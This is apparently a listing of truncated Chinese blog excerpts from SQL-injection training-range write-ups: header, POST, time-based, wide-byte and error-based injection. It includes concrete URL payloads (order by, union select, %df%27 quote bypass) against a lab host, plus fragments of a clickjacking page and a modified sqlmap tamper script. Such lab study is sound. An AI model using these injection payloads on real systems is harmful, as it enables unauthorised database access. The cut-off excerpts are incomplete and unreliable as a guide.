Header注入，注入点在请求的header头里面：6.5.1-SQL注入-Header注入Rank 11、首先靶场header注入第一题：用户名密码界面，当用户名密码正确时，界面的回显出来UA信息2、使用工具抓包修改UA的信息，发现注入点就在这，但那是尝试回显或盲注都注入失败3、看到下面这个报错完全一脸蒙：Column count doesn't match value count at

6.6.2-SQL注入-Post注入Rank 1既然是POST注入那就直接抓包了 ，1、当用户名中包含有单引号时，响应报文中显示sql语句有错误，但是单引号并没有转义2、测试下字段数，有响应，可以查询到字段数是2，然后查看是否有回显；3、然后查询数据库版本和库名4、知道了数据库名可以查数据库的所有表和表字段5、最后知道表字段表名就直接查数据 ：6.6.2-SQL注入-Post注入Rank 2这里只

6.4.1-SQL注入-延时注入Rank 1经过检测第一关和盲注是一样的，sql语句对错界面会有不同的回显，属于布尔型的盲注。6.4.1-SQL注入-延时注入Rank 21、首先正常参数检测：?id=1,界面回显有You are in 。。。。。2、然后单引号检测：?id=1',回显和上面是一样的，再尝试其他的查询字段数啊，都是一样的回显。那么就尝试延时注入了，首先了解下延时注入涉及mys

6.3.1-SQL注入-宽字节注入Rank 11、单引号检测：?id=1，被转义了 ，标题宽字节，利用%df%27绕过，待补全知识点；2、猜测表字段：?id=1%df%27%20order%20by%203%20--+3、查看界面回显：?id=-1%df%27%20union select 1,2,3--+（2、3有回显）4、查看数据库版本和当前的数据库名：?id=-1%df%27%20union

1、盲注，比较有难度了 ，相比与没有回显注入，界面上可能只有两种提示，首先我们还是输入参数?id=1,界面直接显示了sql语句，然后尝试id=-1,界面上的”You are in ......”消失了 ，说明sql语句没有问题但是查询的id参数不存在时”You are in ......”消失了2、然后猜测字段数：?id=1' order by 3 --+3、猜数据库长度，然后根据长度猜测

6.1.3同样的方式，只是sql语句中id参数的类型不一样 查询字段数：http://120.203.13.75:8150/New/ErrorBased/RankThree/sql-three/?id=-1%27)%20order%20by%203%20%23查询界面回显：http://120.203.13.75:8150/New/ErrorBased/RankThree/sql-three/?i

1、同上一题一样，只不过这里的id没有了单引号：http://120.203.13.75:8150/New/ErrorBased/RankTwo/sql-two/?id=-12、同样那就猜测表字段数猜到为3 ：http://120.203.13.75:8150/New/ErrorBased/RankTwo/sql-two/?id=-1%20order%20by%203%20%233、查看页面回显：

1、首先拿到靶场，界面提示需要输入ID为数值的参数，而界面没有输入框，只能从URL下手。2、那么在URL后添加上?id=1,构造的链接是：http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=13、从上一步的页面回显我们看到界面直接打印出了sql语句，那接下来就尝试猜测对应的当前表的字段数，构造的链接http://120.203.

<!DOCTYPE HTML><html><head><title>点击劫持</title><meta charset="UTF-8"/><style>body{background-image:url(./4.png);/*设置背景图片*/text-align:center;/*设置居中对齐*

#代码是借助sqlmap自带的tamper的脚本，然后在这个基础上去修改的，只修改了部分。#!/usr/bin/env pythonimport osimport refrom lib.core.common import singleTimeWarnMessagefrom lib.core.data import kbfrom lib.core.enums import DBMSfrom lib